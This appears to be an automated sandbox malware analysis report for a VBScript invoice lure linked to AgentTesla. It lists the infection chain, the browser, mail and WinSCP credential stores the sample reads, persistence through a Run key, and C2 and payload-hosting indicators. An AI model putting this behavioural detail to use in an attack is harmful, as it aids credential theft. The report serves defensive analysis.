            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Code function: 12_2_00383675 GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, QueryPerformanceCounter, 12_2_00383675
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match | File source: 0000000A.00000002.3362357592.00000000245A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.3362357592.0000000024551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: Yara match | File source: 0000000A.00000002.3362357592.0000000024551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            Source: Yara match | File source: 0000000A.00000002.3362357592.00000000245A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.3362357592.0000000024551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information221
            Scripting
            Valid Accounts121
            Windows Management Instrumentation
            221
            Scripting
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution
            1
            DLL Side-Loading
            111
            Process Injection
            2
            Obfuscated Files or Information
            1
            Credentials in Registry
            1
            File and Directory Discovery
            Remote Desktop Protocol1
            Data from Local System
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts112
            Command and Scripting Interpreter
            1
            Registry Run Keys / Startup Folder
            1
            Registry Run Keys / Startup Folder
            1
            Software Packing
            Security Account Manager25
            System Information Discovery
            SMB/Windows Admin Shares1
            Email Collection
            1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell
            Login HookLogin Hook1
            Timestomp
            NTDS1
            Query Registry
            Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets331
            Security Software Discovery
            SSHKeylogging13
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Masquerading
            Cached Domain Credentials1
            Process Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
            Virtualization/Sandbox Evasion
            DCSync151
            Virtualization/Sandbox Evasion
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
            Process Injection
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Hidden Files and Directories
            /etc/passwd and /etc/shadow1
            System Network Configuration Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            Rundll32
            Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
Behavior Graph ID: 1427893
Sample: Factura2.vbs
Startdate: 18/04/2024
Architecture: WINDOWS
Score: 100

Start node
  DNS/IP: mail.cash4cars.nz; ip-api.com; 2 other IPs or domains
  Signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 6 other signatures
  Started: wscript.exe 1; newfile.exe 1; newfile.exe 3 1; rundll32.exe

wscript.exe
  Signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 2 other signatures
  Started: powershell.exe 14 19

powershell.exe (started by wscript.exe)
  DNS/IP: drive.google.com 64.233.185.138, 443, 49700, 49710 GOOGLEUS United States; drive.usercontent.google.com 74.125.138.132, 443, 49701, 49711 GOOGLEUS United States
  Signatures: Suspicious powershell command line found; Very long command line found; Found suspicious powershell code related to unpacking or dynamic code loading
  Started: powershell.exe 17; conhost.exe; cmd.exe 1

powershell.exe (started by the first powershell.exe)
  Signatures: Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading
  Started: wab.exe 16 10; cmd.exe 1

wab.exe
  DNS/IP: ip-api.com 208.95.112.1, 49712, 80 TUT-ASUS United States; mail.cash4cars.nz 114.142.162.17, 26, 49713 SERVERMULE-AS-APNimbus2PtyLtdAU Australia
  Dropped: C:\Users\user\AppData\Roaming\...\newfile.exe, PE32
  Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Hides that the sample has been downloaded from the Internet (zone.identifier)

Source | Detection | Scanner | Label
Factura2.vbs | 17% | Virustotal |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\newfile\newfile.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\newfile\newfile.exe | 0% | Virustotal |

No Antivirus matches

Source | Detection | Scanner | Label
mail.cash4cars.nz | 2% | Virustotal |

Source | Detection | Scanner | Label
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
http://crl.microsoft | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
mail.cash4cars.nz | 114.142.162.17 | true | false | | unknown
drive.google.com | 64.233.185.138 | true | false | | high
drive.usercontent.google.com | 74.125.138.132 | true | false | | high
ip-api.com | 208.95.112.1 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://ip-api.com/line/?fields=hosting | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.google.com | powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2895451341.00000243B8200000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://drive.usercontent.google.com | powershell.exe, 00000002.00000002.2774144836.00000243A9F7D000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000005.00000002.2588020964.0000000005167000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000005.00000002.2588020964.0000000005011000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.microsoft | powershell.exe, 00000005.00000002.2595421485.0000000007B4F000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000005.00000002.2588020964.0000000005167000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000002.00000002.2774144836.00000243A95EA000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2895451341.00000243B8200000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://drive.google.com | powershell.exe, 00000002.00000002.2774144836.00000243A9A4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A83B7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://drive.usercontent.googh | powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://drive.usercontent.google.com | powershell.exe, 00000002.00000002.2774144836.00000243A861C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://drive.googPb | powershell.exe, 00000002.00000002.2774144836.00000243A9F3D000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://drive.google.com | powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2774144836.00000243A8191000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://apis.google.com | powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2774144836.00000243A8191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2588020964.0000000005011000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000005.00000002.2588020964.0000000005167000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
114.142.162.17 | mail.cash4cars.nz | Australia | 133525 | SERVERMULE-AS-APNimbus2PtyLtdAU | false
74.125.138.132 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
64.233.185.138 | drive.google.com | United States | 15169 | GOOGLEUS | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1427893
Start date and time: 2024-04-18 10:10:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 23s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Factura2.vbs
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winVBS@15/10@4/4
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 90%
• Number of executed functions: 60
• Number of non-executed functions: 13
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 72.21.81.240
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 5672 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 6136 because it is empty
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
10:10:53 | API Interceptor | 1x Sleep call for process: wscript.exe modified
10:10:56 | API Interceptor | 81426x Sleep call for process: powershell.exe modified
10:11:47 | API Interceptor | 46x Sleep call for process: wab.exe modified
10:11:50 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run newfile C:\Users\user\AppData\Roaming\newfile\newfile.exe
10:11:58 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run newfile C:\Users\user\AppData\Roaming\newfile\newfile.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | yDOZ8nTvm8.rtf | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | Fizetes,jpg.scr.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | Cintillo 2024.pdf.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | comprobante.pdf.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | QUOTATION-#170424.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | dekont.pdf.exe | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | PO JSC_109117.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | PURCHASE ORDER LISTS GREEN VALLY CORP.bat | malicious | GuLoader | ip-api.com/line/?fields=hosting
208.95.112.1 | dgxK76VlXC.exe | malicious | AsyncRAT, StormKitty, SugarDump, VenomRAT, XWorm, XenoRAT | ip-api.com/line/?fields=hosting
114.142.162.17 | http://otahuhumainstreet.co.nz | malicious | Unknown | otahuhumainstreet.co.nz/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip-api.com | yDOZ8nTvm8.rtf | malicious | AgentTesla | 208.95.112.1
ip-api.com | SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | Fizetes,jpg.scr.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | Cintillo 2024.pdf.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | comprobante.pdf.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZ | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine | 208.95.112.1
ip-api.com | QUOTATION-#170424.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | dekont.pdf.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
ip-api.com | PO JSC_109117.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | PURCHASE ORDER LISTS GREEN VALLY CORP.bat | malicious | GuLoader | 208.95.112.1
mail.cash4cars.nz | FACTURA2402616 - BP.vbs | malicious | AgentTesla, GuLoader | 114.142.162.17
mail.cash4cars.nz | 20220829_PEDIDO_22073M_PROTECO.exe | malicious | AgentTesla, PureLog Stealer, RedLine | 114.142.162.17
mail.cash4cars.nz | wphil.exe | malicious | AgentTesla | 114.142.162.17
mail.cash4cars.nz | phills.exe | malicious | AgentTesla | 114.142.162.17
mail.cash4cars.nz | TRANSFERENCIA.vbs | malicious | AgentTesla, GuLoader | 114.142.162.17
Match | Associated Sample Name / URL | Detection | Threat Name | Context
SERVERMULE-AS-APNimbus2PtyLtdAU | FACTURA2402616 - BP.vbs | malicious | AgentTesla, GuLoader | 114.142.162.17
SERVERMULE-AS-APNimbus2PtyLtdAU | https://loia.co.nz/news/ | malicious | Unknown | 114.142.162.113
SERVERMULE-AS-APNimbus2PtyLtdAU | 20220829_PEDIDO_22073M_PROTECO.exe | malicious | AgentTesla, PureLog Stealer, RedLine | 114.142.162.17
SERVERMULE-AS-APNimbus2PtyLtdAU | wphil.exe | malicious | AgentTesla | 114.142.162.17
SERVERMULE-AS-APNimbus2PtyLtdAU | phills.exe | malicious | AgentTesla | 114.142.162.17
SERVERMULE-AS-APNimbus2PtyLtdAU | http://otahuhumainstreet.co.nz | malicious | Unknown | 114.142.162.17
SERVERMULE-AS-APNimbus2PtyLtdAU | TRANSFERENCIA.vbs | malicious | AgentTesla, GuLoader | 114.142.162.17
SERVERMULE-AS-APNimbus2PtyLtdAU | https://url7923.marsello.io/ls/click?upn=Xn88PJeNIL29Y2OVpP6Ui77nuc8oDLgngY4uyeAXou9EXVhHDo7M7WHe3tN4zKrNqxWWEA5i4ALTH8pKKbUBr8kl-2BaKOzRLYF4O9jWbQC4ETh3gaxy9Zl1P3us3e17tJsOUlwKwJzxH4U-2B4YCtdCKhwUoMCpyg7NNUrzuTgIzLhQxGftKThIbPuB8Nb-2BmtgGKsOqoXJ6U-2BADfghQ4BcLNnTCz8WOPd-2BpwYHQG27-2BmJL39Wz4GTGCtL1hCPh2SqRMSXI8OwZccm8GVU0Gku6MXMfJSjn1THezTD7Flfnhq9iTsL-2BqgwPTJls8-2BjTRc9BY-2Fh46AKx7Gq-2BWbs5Lh-2FWQDqHD79-2B4wi1xXGfVC-2BI5uRu3qb5Q9qE91C7McXL75baWeYwaEUD7jYVNTTkRP-2FiKAc2nAmKMZsvHdn9PKT9NJ5TiHTmuV8UPHx0hFbT-2FoZA30Gyvk1bp9nD9i4ph-2FoNGhnG8uLjEFPWprwatRp-2BQP6kJLn0uBau00h5QqYuOD7Gd92H3pJEI2BfGxRuVIYX14IBzVhmt-2FctDQIodsoatwLgBTnXhKygRejP8skmeldJI5rHqpFfHhWIg1giPRBfTcEg150YV1v9ETyT6Uifk9s6pHCUdZuw8FUIg-2FSbNwIPCsOE0tsI92UTXCdYi6N-2BNoVyL5OSJbyKJgkTtz2jqi7AlzjDgir0my-2FxeWtqBHHYkMxYllC-2FmTPEy-2FqqCLzFEBLlb8e7rfV0bdk6NMZJP-2BDoaOQFrsJCqLrTH-2FHiFfjxsqFhZdUVupOzthlEpPfONW-2B2H8nekGdMTeaCngXu3zWc9dllqrzWlyGYp5lI7idB-2Fns-2BSeSTLsYROOiQFyQnqs5rmrBtcUWvjJHXJ3dmnj8KOfXx7z7cF1nFFIoLyyC4A2WszgjnyvArLXGAkLuDptrq7S-2F88fXEocvf6m6FOIX5hxP5J-2FvC2AO5vvCZZGy9uq34DhBKapR-2B7Vxz1tPfsMZilBPcewHkG4U49WMe8dMwUgJvvBkUx7yWefFJGBtWEORYw_2Y2nVgmUakfOiBzkPBl9g-2FvXw-2FFdue1unOqOSl8Xbnm8oyn4sQ-2F2R3PuNTB7lzli8dA6wSmZNwvXv0UBP70uz2P7zFeqUQegpRcaNeCb4-2BWo5EMrZl28tbwQuhDxCamhvmJQ78wNqNkJLChbQ5ciL5dF8RTLCXk67iO0rqc-2B997j0jfrQKNGv90V9PpeyTMKMz6uyPn3kl5bKhRkgMa89T2u1Ha6YWBhcLFnbd7qfYUd0oAl-2FInhvnCyq9jNwdAsFJFgoaHWAB8L64Z2VCGpLFl8sksVrNSWRj-2BTF3SRr64edhOQkh-2BO3y489msvprf-2F&utm_source=tinas-newsletter-1eb35b.beehiiv.com&utm_medium=newsletter&utm_campaign=new-post | malicious | Unknown | 114.142.162.65
SERVERMULE-AS-APNimbus2PtyLtdAU | https://r20.rs6.net/tn.jsp?f=001U66jxouxDpcCsmHjJXG8d7KqPNZ55zh32bLc0C3cqHFmMI6VgvlDVFCZtVmckIpGvZ5W1UicaYKH3h7Sc5p1gpFJsVHUNrlWmnnZcDVIFDY2JyVJHYKv5ZTaDnWV_0ErkJ_Bbrk-kSY=&c=&ch=/&__=/b6aa/GDGnz/dmFuZGl0YS5zYW1hdmVkaUBvdmVybGFrZWhvc3BpdGFsLm9yZw== | malicious | HTMLPhisher | 114.142.162.97
SERVERMULE-AS-APNimbus2PtyLtdAU | e5ec904f-4817-d75a-afb8-0811d36c8183.eml | malicious | Unknown | 114.142.162.17
TUT-ASUS | yDOZ8nTvm8.rtf | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | Fizetes,jpg.scr.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | Cintillo 2024.pdf.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | comprobante.pdf.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZ | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine | 208.95.112.1
TUT-ASUS | QUOTATION-#170424.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | dekont.pdf.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
TUT-ASUS | PO JSC_109117.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | PURCHASE ORDER LISTS GREEN VALLY CORP.bat | malicious | GuLoader | 208.95.112.1
Match: 3b5074b1b5d032e5620f69f9f700ff0e

Associated Sample Name / URL | Detection | Threat Name | Context
Purchase Order PDF.exe | malicious | AgentTesla | 74.125.138.132, 64.233.185.138
Leoch-Purchase Order.exe | malicious | AgentTesla | 74.125.138.132, 64.233.185.138
p silp AI240190.pdf.exe | malicious | AgentTesla | 74.125.138.132, 64.233.185.138
SecuriteInfo.com.Variant.MSILHeracles.77820.8707.3938.exe | malicious | Unknown | 74.125.138.132, 64.233.185.138
SecuriteInfo.com.Win32.PWSX-gen.1728.1300.exe | malicious | AgentTesla | 74.125.138.132, 64.233.185.138
SecuriteInfo.com.Heur.15333.25205.exe | malicious | AgentTesla | 74.125.138.132, 64.233.185.138
SecuriteInfo.com.Variant.MSILHeracles.77820.8707.3938.exe | malicious | Unknown | 74.125.138.132, 64.233.185.138
Leoch-Purchase Order.exe | malicious | AgentTesla | 74.125.138.132, 64.233.185.138
SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe | malicious | AgentTesla | 74.125.138.132, 64.233.185.138
SecuriteInfo.com.Win32.MalwareX-gen.3610.30636.exe | malicious | AgentTesla | 74.125.138.132, 64.233.185.138
37f463bf4616ecd445d4a1937da06e19u2.bat | malicious | Bazar Loader, Qbot | 74.125.138.132, 64.233.185.138
SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe | malicious | Phonk Miner, PureLog Stealer, Vidar | 74.125.138.132, 64.233.185.138
file.exe | malicious | Vidar | 74.125.138.132, 64.233.185.138
FACTURA2402616 - BP.vbs | malicious | AgentTesla, GuLoader | 74.125.138.132, 64.233.185.138
#U03a3#U03a5#U039c#U0392#U039f#U039b#U0391#U0399#U039f DEV8759-pdf.exe | malicious | Discord Token Stealer, GuLoader | 74.125.138.132, 64.233.185.138
#U03a3#U03a5#U039c#U0392#U039f#U039b#U0391#U0399#U039f DEV8759-pdf.exe | malicious | GuLoader | 74.125.138.132, 64.233.185.138
file.exe | malicious | Vidar | 74.125.138.132, 64.233.185.138
S#U00d6ZLE#U015eME DEV8759 - pdf.exe | malicious | GuLoader | 74.125.138.132, 64.233.185.138
CONTRACTUL DEV8759-pdf.exe | malicious | GuLoader | 74.125.138.132, 64.233.185.138
1704202412475.EXE.exe | malicious | FormBook, GuLoader | 74.125.138.132, 64.233.185.138
